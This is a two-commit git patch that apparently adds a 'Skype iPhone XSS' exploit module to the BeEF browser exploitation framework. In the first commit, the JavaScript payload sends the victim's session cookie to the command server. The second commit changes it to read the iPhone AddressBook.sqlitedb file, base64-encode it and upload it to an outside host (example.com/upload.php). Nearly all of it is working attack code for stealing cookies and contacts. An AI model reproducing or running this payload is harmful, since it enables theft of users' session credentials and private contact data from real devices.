From 8c74fdd6809f1c30ce72fa965e25f2a191bdf33a Mon Sep 17 00:00:00 2001 From: asaafan Date: Fri, 9 Mar 2012 01:55:44 +0200 Subject: [PATCH 1/2] Adding branch for Skype XSS module --- modules/exploits/skype_xss/command.js | 21 +++++++++++++++++++ modules/exploits/skype_xss/config.yaml | 25 +++++++++++++++++++++++ modules/exploits/skype_xss/module.rb | 28 ++++++++++++++++++++++++++ 3 files changed, 74 insertions(+) create mode 100644 modules/exploits/skype_xss/command.js create mode 100644 modules/exploits/skype_xss/config.yaml create mode 100644 modules/exploits/skype_xss/module.rb diff --git a/modules/exploits/skype_xss/command.js b/modules/exploits/skype_xss/command.js new file mode 100644 index 000000000..7f0049186 --- /dev/null +++ b/modules/exploits/skype_xss/command.js @@ -0,0 +1,21 @@ +// +// Copyright 2012 Wade Alcorn wade@bindshell.net +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +beef.execute(function() { + + beef.net.send("<%= @command_url %>", <%= @command_id %>, 'cookie='+document.cookie); + +}); + diff --git a/modules/exploits/skype_xss/config.yaml b/modules/exploits/skype_xss/config.yaml new file mode 100644 index 000000000..fd90b2cf4 --- /dev/null +++ b/modules/exploits/skype_xss/config.yaml @@ -0,0 +1,25 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +beef: + module: + skype_xss: + enable: true + category: "Exploits" + name: "Skykpe iPhone XSS" + description: "This module will retrieve the session cookie from the current page." + authors: ["saafan"] + target: + working: ["ALL"] diff --git a/modules/exploits/skype_xss/module.rb b/modules/exploits/skype_xss/module.rb new file mode 100644 index 000000000..852361629 --- /dev/null +++ b/modules/exploits/skype_xss/module.rb @@ -0,0 +1,28 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +class Get_cookie < BeEF::Core::Command + + def post_execute + + ##Stub## + + + content = {} + content['cookie'] = @datastore['cookie'] + save content + end + +end From a5e7823588f3e9e49a9d14cee74bae2646bf423d Mon Sep 17 00:00:00 2001 From: Saafan Date: Sat, 10 Mar 2012 20:46:04 +0200 Subject: [PATCH 2/2] Adding the JS code of the Skype XSS exploit --- modules/exploits/skype_xss/command.js | 27 +++++++++++++++++++++++++- modules/exploits/skype_xss/config.yaml | 4 ++-- modules/exploits/skype_xss/module.rb | 4 +--- 3 files changed, 29 insertions(+), 6 deletions(-) diff --git a/modules/exploits/skype_xss/command.js b/modules/exploits/skype_xss/command.js index 7f0049186..290648bd9 100644 --- a/modules/exploits/skype_xss/command.js +++ b/modules/exploits/skype_xss/command.js @@ -15,7 +15,32 @@ // beef.execute(function() { - beef.net.send("<%= @command_url %>", <%= @command_id %>, 'cookie='+document.cookie); + x = new XMLHttpRequest; + x.open("get","file:///var/mobile/Library/AddressBook/AddressBook.sqlitedb"); + x.overrideMimeType("text/plain; charset=x-user-defined"); + x.send(); + + x.onreadystatechange = function() { + if(x.readyState == 4){ + a = x.responseText || ""; + ff=[]; + mx=a.length; + scc = String.fromCharCode; + } + for(var z = 0 ; z < mx ; z++){ + ff[z] = scc(a.charCodeAt(z)&255); + } + + b=ff.join(""); + b=btoa(b); + xp = new XMLHttpRequest; + xp.open("post","http://example.com/upload.php",!0); + xp.setRequestHeader("Content-Type","multipart/form-data;boundary=xxx,"); + a = "--xxx\r\nContent-Disposition:form-data;name=\"media\";filename=\"ios.sqlitedb\"\r\nContent-Type:application/octet-stream\r\n\r\n"+b+"\r\n--xxx--"; + xp.send(a); + }; + + beef.net.send("<%= @command_url %>", <%= @command_id %>, 'SQL file sent'); }); diff --git a/modules/exploits/skype_xss/config.yaml b/modules/exploits/skype_xss/config.yaml index fd90b2cf4..2745685d7 100644 --- a/modules/exploits/skype_xss/config.yaml +++ b/modules/exploits/skype_xss/config.yaml @@ -18,8 +18,8 @@ beef: skype_xss: enable: true category: "Exploits" - name: "Skykpe iPhone XSS" - description: "This module will retrieve the session cookie from the current page." + name: "Skykpe iPhone XSS Steal Contacts" + description: "This module will steal iPhone contacts using a Skype XSS vuln." authors: ["saafan"] target: working: ["ALL"] diff --git a/modules/exploits/skype_xss/module.rb b/modules/exploits/skype_xss/module.rb index 852361629..26f189c47 100644 --- a/modules/exploits/skype_xss/module.rb +++ b/modules/exploits/skype_xss/module.rb @@ -20,9 +20,7 @@ class Get_cookie < BeEF::Core::Command ##Stub## - content = {} - content['cookie'] = @datastore['cookie'] - save content + save({'result' => @datastore['result']}) end end